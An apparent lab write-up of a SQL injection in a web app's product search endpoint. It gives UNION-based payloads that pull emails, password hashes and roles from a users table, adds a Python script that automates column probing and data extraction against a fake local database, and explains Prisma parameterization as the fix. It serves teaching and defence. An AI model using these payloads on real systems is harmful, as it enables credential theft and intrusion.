
Article Documents SQL Injection Vulnerability in Product Search Feature
An article documents the exploitation of a SQL injection vulnerability in the product search feature of a web application. The flaw lets an attacker alter the backend SQL query through unsanitized user input, read data from tables the search was never meant to expose, and recover a flag in a lab environment. The vulnerable environment is started locally with a CLI utility.

The attack surface is the product search function, reachable from the navigation header, which sends requests to the endpoint /api/products/search?q=<search_term>. The server builds its SQL query by splicing the raw value of the q parameter into the query text, so a request can append further clauses, such as a UNION SELECT, to the statement the database actually executes.

Exploitation proceeds in three steps. First, a benign search term confirms the normal behaviour of the endpoint. Second, a probe such as ' UNION SELECT 1,2,3,4,5-- checks that injection is possible: the leading quote closes the original string literal, the injected SELECT must return the same number of columns as the original query (five here), and the trailing -- comments out the rest of the original statement, including its closing quote. Third, a payload such as DELIVERED' UNION SELECT id, email, password, role, addressId FROM users-- appends rows from the users table to the product results, returning account data (including password hashes and roles) through the search response.

The root cause is direct interpolation of a user-supplied string into a raw SQL query, classified as CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). The remediation is to let Prisma parameterize user input instead of concatenating it into the query text: Prisma's query builder (for example findMany with a where clause) and the $queryRaw tagged-template form both send the value as a bound parameter. Note that this only holds if the value stays a template expression; passing a pre-built string through $queryRawUnsafe, or wrapping the input in Prisma.raw, reintroduces the same flaw.
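The following is an added example, not code from the article or from the application it describes. It reproduces the vulnerable search against a stand-in in-memory SQLite database (Python's sqlite3 module rather than the app's Prisma stack) so the three payloads from the writeup can be run offline, and it goes one step further than the article by automating the column-count probe behind the ' UNION SELECT 1,2,3,4,5-- test. The schema, the exact WHERE clause shape (status = '<q>'), the product column names beyond the five-column count implied by the payloads, and all row data are assumptions constructed for the demonstration.

```python
import sqlite3

# Constructed sample data. The two tables each expose five columns so that the
# writeup's UNION payloads line up; the products schema and the row contents
# are assumptions, not the lab's real data.
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price_cents INTEGER, status TEXT);
CREATE TABLE users (id INTEGER, email TEXT, password TEXT, role TEXT, addressId INTEGER);
INSERT INTO products VALUES (1, 'Widget', 'A basic widget', 999, 'DELIVERED');
INSERT INTO products VALUES (2, 'Gadget', 'A handy gadget', 1999, 'PENDING');
INSERT INTO users VALUES (1, 'admin@example.test', 'fakehash-admin', 'admin', 10);
INSERT INTO users VALUES (2, 'alice@example.test', 'fakehash-alice', 'customer', 11);
"""


def open_db() -> sqlite3.Connection:
    """Open an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list:
    """CWE-89: q is spliced into the SQL text, so the database parses
    attacker-controlled characters as part of the statement. The WHERE
    clause shape is an assumption about the lab's query."""
    sql = f"SELECT id, name, description, price_cents, status FROM products WHERE status = '{q}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, q: str) -> list:
    """Hardened form: q is sent as a bound parameter and is never re-parsed as
    SQL. This is what Prisma's query builder and $queryRaw template do."""
    sql = "SELECT id, name, description, price_cents, status FROM products WHERE status = ?"
    return conn.execute(sql, (q,)).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10):
    """Generalise the writeup's ' UNION SELECT 1,2,3,4,5-- probe: grow a
    NULL-only UNION until the database stops rejecting the column mismatch.
    Returns the column count of the original SELECT, or None if not found."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            search_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the same
            # number of result columns": try one more column.
            continue
    return None


def dump_users(conn: sqlite3.Connection) -> list:
    """Run the writeup's extraction payload and keep only the rows that came
    from the users table (their second column is an e-mail address)."""
    payload = "DELIVERED' UNION SELECT id, email, password, role, addressId FROM users--"
    rows = search_vulnerable(conn, payload)
    return [r for r in rows if isinstance(r[1], str) and "@" in r[1]]


if __name__ == "__main__":
    db = open_db()
    print("benign search:", search_vulnerable(db, "DELIVERED"))
    print("column count found by probing:", find_column_count(db))
    print("users leaked via UNION:", dump_users(db))
    exfil = "DELIVERED' UNION SELECT id, email, password, role, addressId FROM users--"
    print("same payload against the parameterized query:", search_parameterized(db, exfil))
```

Running the script shows the vulnerable search returning user e-mails, password hashes and roles alongside the product row, while the parameterized version treats the whole payload as a status value and returns nothing. The probe loop uses NULL rather than numeric literals so that it never trips a type mismatch in databases that enforce compatible UNION column types.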